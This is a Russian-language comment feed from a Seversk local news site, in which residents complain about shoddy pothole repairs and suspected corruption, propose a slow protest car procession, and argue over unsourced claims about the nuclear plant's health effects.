Есть предложение провести демонстративный автопробег со скоросьтью 10-15 км.ч например от Современника до Парка. Дату и время сбора определить здесь, распостранить на различных интерент ресурсах и по знакомым. Только необходимо достаточное время для распостранения ( например 19 апреля суббота в 14.00). Помеха для этого только наша лень и неохота ничего не предпринимать, ГИБДД наше давно уже не способна оказывать влияние на такие мероприятия. К администрации сайта просьба организовать голосование типа: 1.Я приеду и буду участвовать, 2.Мне все равно я не приеду, 3.Мне некогда давайте в другой раз.

+1. я участвую.
 
Цитата: shuriki
я имел ввиду конечно же ямочный ремонт.

а нафига он нужен? старая песня о главном..

Комментарий № 74199: Ремонт дороги по-Северски

Написал: shuriki
Марина 75,
выгода ямочного ремонта состоит в том, что подсчитать точное кол-во материала и объем работ невозможно, отремонтировали 4000 квадратов написали 8000, никто же не пойдет с рулеткой мерить и считать эти заплатки. Вот если улицу целиком асфальтировать там да есть определенная площадь на которую все легко подсчитывается. На те деньги которые выделяются ежегодно на ремонт дорог, можно было бы капитально ремонтировать не по одной улице, но дороги находятся в таком запущении, что все денюшки из года в год разбегаются на ямочный ремонт.

Комментарий № 74198: Ремонт дороги по-Северски

Написал: Mesтный
ГУт,Туповатый ты...   причём тут путин !!????? что он тебе дороги ложит асфальтом ????  по такой логике он виноват что тебя  ДОЛБОЁБА  мама твоя родила !!!! Где он и где наши местные дибилы ???  Что он им дал команду класть в гавно?????????

Комментарий № 74197: «Росатом» приступил к строительству экспериментального завода

Написал: NoName
тайга,
Ну, что же, вижу, что за твое пустословие тебе ни капельки не стыдно. Никакой информации по заболеваемости и по влиянию СХК на здоровье человека у тебя нет. Никаких исследований ты не знаешь, а все цифры взял с потолка. Потому, что, оказывается твоя осведомленность не из официальных источников, а:
Цитата: тайга
лучше не из оф. источников , а у знакомых

Это знакомые рассказали тебе, что
Цитата: тайга
92% всех рожденных после 2000года имеют отклонения в генетических показателях (проще говоря , являются в той или иной степени мутантами

Ну откуда ты взял 92% мутантов? Ну целый день упрашиваю дать ссылку на источник. Ну сознайся уже, что выдумал. Впрочем, можешь не сознаваться.
Ну ты же писал:
 
Цитата: тайга
В Северске пожалуй нет не одной семьи в которой бы не было погибших от той или иной формы Рака. А массовая «щитовидка» ?
   \
Ну хоть что-нибудь в подтверждение того. что в Северске заболеваний щитовидной железы больше чем по России. Ну, где-то ты же это взял???


 

Комментарий № 74196: В Северске продолжают продавать алкоголь несовершеннолетним

Написал: Марина 75
Цитата: f1gv83
и что? я не пью, моя семья тоже ни капли в рот
 
Считаете, что это гарантия того, что ваши дети тоже не пробуют, не пьют и пить не будут? 
В ЦУМе одна продавщица с утра частенько такая "мятая", что и не поймет кому-что продаёт. 

Комментарий № 74195: Ремонт дороги по-Северски

Написал: тайга

Хороший комментарий № 24  , все по существу и в точку .



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 74194: ЗАТО какой мэр такие и дороги...

Написал: Woin
Сегодня проезжал по этой "дороге" или "направлению" в сторону гаража на парусинке дорога просто трындец!!! angry Причем не первый год она в таком состоянии .Соли с песком мало сыплют ,может хорошо просолить ,она глядишь и портится не будет! 

Комментарий № 74193: ЗАТО какой мэр такие и дороги...

Написал: Немой
Автор ты не прав..... Дороги в разы лучше мэра

Комментарий № 74192: Ремонт дороги по-Северски

Написал: Марина 75
Цитата: Немой
А может это коррупционная составляющая????
 
Конечно. Обычно заказчик (в данном случае Администрация) требует гарантию качества на год-три. А здесь, видимо, их никто не дает, да и не требует - есть выгода, что через некоторое время можно выгодно вложить деньги бюджета. 

Комментарий № 74191: Ремонт дороги по-Северски

Написал: Немой

Самое печальное в этой ситуации, что форму за эти работы подписывает какой то клоун, который либо тупой, либо купленный с потрахами, уж очень хотелось бы фамилию этого " героя" в студию, пусть горожане знают кто виновен в содержании такой фирмы, которая только и может делать халтуру, причом на глазах у жителей .... И еще.... Это как нужно быть уверенным в том, что никто не сможет их нагнуть, не Шамин, не Диденко..... А может это коррупционная составляющая???? Вопрос к прокуратуре..... Хотя... боюсь что для них это ОЧЕНЬ серьезный вопрос.... На столько серьезный что силы духа не хватит тут покопаться....

Комментарий № 74190: Женщина сбита на пешеходном переходе

Написал: Марина 75
ГУт,
smile 

Комментарий № 74189: Ремонт дороги по-Северски

Написал: shuriki
Palllud, пробег точно поможет - на следующий же день на всех улицах капитальный ремонт начнется.

Комментарий № 74188: ЗАТО какой мэр такие и дороги...

Написал: Марина 75
Цитата: ГУт
лишний раз бить подвеску?!!
 
Да нет по-тихоньку, объезжая ямы. В две полосы))) А как маршрутники? 

Комментарий № 74187: Ремонт дороги по-Северски

Написал: shuriki
f1gv83,
я имел ввиду конечно же ямочный ремонт.

Комментарий № 74186: Навязывание дополнительного страхования в "ВСК"

Написал: Koolboy
Serega,
Все верно
stroimguru.ru
Курс валюты:
76.03 82↓   $     88.78 98↓  

Опрос дня:

Вы будете делать прививку от коронавируса?

Нет   49.38%
   
Да, планирую   8.64%
   
Да, но если заставят (на работе / для путешествий)   4.94%
   
Уже сделал   27.16%
   
Затрудняюсь ответить   9.88%
   
Всего голосов: 81

Все опросы >>

Архив статей: